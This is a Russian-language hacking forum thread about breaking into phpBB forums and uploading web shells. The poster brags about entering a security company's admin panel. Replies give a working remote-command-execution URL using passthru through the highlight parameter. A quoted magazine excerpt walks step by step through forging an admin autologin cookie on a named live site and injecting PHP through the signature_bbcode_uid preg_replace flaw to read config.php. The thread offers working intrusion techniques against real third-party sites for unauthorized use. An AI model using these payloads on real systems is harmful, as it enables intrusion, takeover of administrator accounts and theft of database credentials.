![]() |
Взлом. Способы заливки шелла в phpBB.
Искал я в гуглике форумы phpBB.. наткнулся на форум компании предоставления программного обеспечения для Защиты Информации. Форум у них phpBB 2.0.3.. Грех не ломануть...
Короче, в админку я пролез секунд через 40, но вот с шеллом запар.. Заливаю, вроде все норм. Запускаю ls -la, там залилась какая-то новая страница pagestart.php, я pwd смотрю дирикторию - папка admin. Захожу на эту левую pagestart, а там надпись что-то типа "Hack attempted".. Но шелла нигде нет... Что произошло? Где шелл? Просвятите, плз.. |
Зачем тебе что-то заливать.google: phpbb <=2.0.10 highlight
выполнение комманд сразу. |
мне известно лишь 4 способа залития шелла в phpbb
1) через стили 2) через БД 3) через профайл (любого юзера) 4) через профайл и бд. все сплойты есть на rst.void.ru подправишь их, и они будут пахать |
я через стили лез..
|
Цитата:
|
Цитата:
|
Вроде же эксплоит написан в пёрле а не на пхп, зачем тебе компил пхп? лутши актив пёрл скачай, установи, потом комндную строку.
|
мда, это ж каким терпением и выдержкой надо обладать чтобы модерить в разделе форумов. кошмар, слава всевышнему, что меня сняли.
компилы php,perl мда. Народ вы бы хотя бы думали о чом пишете, а то услышал звон хз где он. вот сплойт http://site.ru/forum/viewtopic.php?t=7&cmd=ls&highlight='.passthru($HTT P_GET_VARS[cmd]).' если ты спросишь, как его скомпилить, минусами закидаю |
Сорри, я просто нашел какую-то ботву на php.. вопросов больше не имею..
|
Вот вырезка из Хакера(87), прочитай, может поможет...
http://www.systemfond.ru/forum/viewt...ighlight=%2527 Ничего не получается, форум не выдает никакой ошибки, значит, будем использовать более новую уязвимость всех версий форума phpBB<=2.0.17 — связки php-функции preg_replace() и переменной signature_bbcode_uid (м-да, с регулярными выражениями у авторов phpBB беда, учите паттерны!). Итак, пробуем регистрироваться… Неудача! Активация пользователей на форуме осуществляется самими администраторами. Вспоминаем про еще одну уязвимость форума — возможность входа под любым пользователем через багу в кукисах. Нам нужен аккаунт админа, значит, идем в браузер Опера, в меню Сервис->Дополнительно->Управление cookies (если ты сидишь не в Опере, то поищи на nsd.ru (или на www.xakep.ru) проги для редактирования оных), ищем там www.systemfond.ru, удаляем содержимое переменной iconboard_sid (да-да, так админы назвали кукисы, думали, что это чем-то поможет, наивные), а в iconboard_data вставляем следующее значение: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D Поясню, с помощью этой строки мы залогинимся под пользователем с id=2, так как в скрипте, отвечающем за вход, недостаточно проверяется соответствие типов переменных. Если вдруг тебе понадобится другой пользователь, то ты легко можешь вставить любой id в это значение здесь: 3A%22[id]%22%3B%7D [берем от админа все] Перезагружаем страницу (так, чтобы в ее параметрах не было sid, так как с любым существующим значением sid ничего не получится), в итоге оказываемся залогиненными под администратором [ Kudesnik ]. Итак, идем в редактирование профиля нашего админа :). Сохраняем страницу себе на хард, в html-коде находим <form action="profile.php" method="post"> и меняем на <form action=www.systemfond.ru/forum/profile.php?signature_bbcode_uid=(.*)/e%00 method="post"> Загружаем полученную страницу и в поле подписи вставляем [b:file_get_contents($_GET[bb]) В это место можно, естественно, вставить любой php-код, в том числе и system() -после "[b:". Но сейчас нам нужна именно функция получения содержимого файла. Нажимаем «Отправить» и идем по ссылке http://www.systemfond.ru/forum/profi...&bb=config.php. В поле подписи нам открылось содержание config.php, |
| Время: 11:24 |